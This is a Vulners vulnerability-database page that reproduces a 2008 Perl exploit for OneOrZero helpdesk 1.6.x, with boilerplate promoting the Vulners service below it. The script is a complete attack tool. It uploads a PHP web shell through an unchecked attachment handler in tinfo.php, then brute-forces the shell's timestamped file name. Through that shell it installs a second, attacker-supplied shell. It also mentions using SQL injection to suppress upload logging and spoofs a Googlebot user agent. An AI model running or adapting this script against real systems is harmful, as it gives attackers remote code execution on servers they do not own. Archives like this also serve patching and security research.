Vulners
Lucene search
OneOrZero helpdesk 1.6.x. - Remote Shell Upload Exploit
#!/usr/bin/perl
=about
OneOrZero 1.6.* Perl exploit
AUTHOR
discovered & written by Ams
ax330d [doggy] gmail [dot] com
VULN. DESCRIPTION:
In 'tinfo.php' script there are function
named uploadAttachment() through which
we are able to upload files.
It does not checks what the file
is uploaded.
EXPLOIT WORK:
First of all it uploads small shell,
then, due to unknown shell name,
it bruteforces it.
(Uploaded shell name is concatenation
of original filename,
unix timestamp and substracted
microseconds from time.)
Then it uploads new shell through
small shell.
(Script saves to DB what has been uploaded,
but if magic_quotes_gpc=off exploit
will disable this logging via SQl-inj.)
REQUIREMENTS:
Upload must be allowed.
PS:
With register_globals=on there are even more
vulnerabilities, starting from LFI till
remote code execution.
=cut
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
$| = 1;
&banner;
my $expl_url = shift or &usage;
my $tshell2 = shift;
&usage unless -f $tshell2;
my $tshell = q(<?php move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name'])?print('ok1'):0;?>);
my $spider = LWP::UserAgent->new;
$spider->timeout(9);
$spider->max_redirect(0);
$spider->agent('Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
exploit($expl_url);
sub exploit {
$_ = shift;
my($prot, $host, $path, ) = m{(?:([^:/?#]+):)?(?://([^/?#]*))?([^?#]*)(?:\?([^#]*))?(?:#(.*))?};
print "\n\tExploiting: $prot://$host$path\n";
my $req
= POST "$prot://$host$path/tinfo.php?id=999999",
Content_Type => 'form-data',
Content => [send_mail => 1,
SelectedFile => [ undef, 'by441e.php', 'Content_Type' => '\' text', 'Content' => $tshell ]
];
my $start_time = time();
my $res = $spider->request($req);
if (!$res->is_success) {
print "\tFailure...\n" . $res->status_line . "\n";
return 0;
}
if ($res->content !~ /by441e\.php/) {
print "\tFailure...\n";
return 0;
} else {
print "\n\tTest shell uploaded";
}
my $finish_time = time();
print "\n\tStarting bruteforce (start:${start_time}000 finish:${start_time}999)\n";
for my $sec ($start_time .. $finish_time) {
for my $micro ('000' .. '999') {
print "\t$prot://$host$path/attachments/$sec${micro}_by441e.php\r";
$res = $spider->request(HEAD "$prot://$host$path/attachments/$sec${micro}_by441e.php");
if ($res->status_line =~ /200/) {
print "\n\tFound one of shells...";
if (reload("$prot://$host$path/attachments/$sec${micro}_by441e.php")) {
print "\tShell: $prot://$host$path/attachments/sha.php\n";
}
return;
}
}
}
print "\n\tCould not find shell...\n";
}
sub reload {
my $addr = shift;
my $req
= POST $addr,
Content_Type => 'form-data',
Content => [ f => [ $tshell2, 'sha.php']];
my $res = $spider->request($req);
if ($res->content =~ /ok1/) {
print "new shell uploaded!\n";
return 1;
} else {
print "could not upload new shell.\n";
return 0;
}
}
sub usage {
print "
Provide url and shell what to upload.
Usage:
perl $0 http://example.com localshell.php
";
exit;
}
sub banner {
print "
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
OneOrZero 1.6.* exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
";
}
# milw0rm.com [2008-12-19]
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1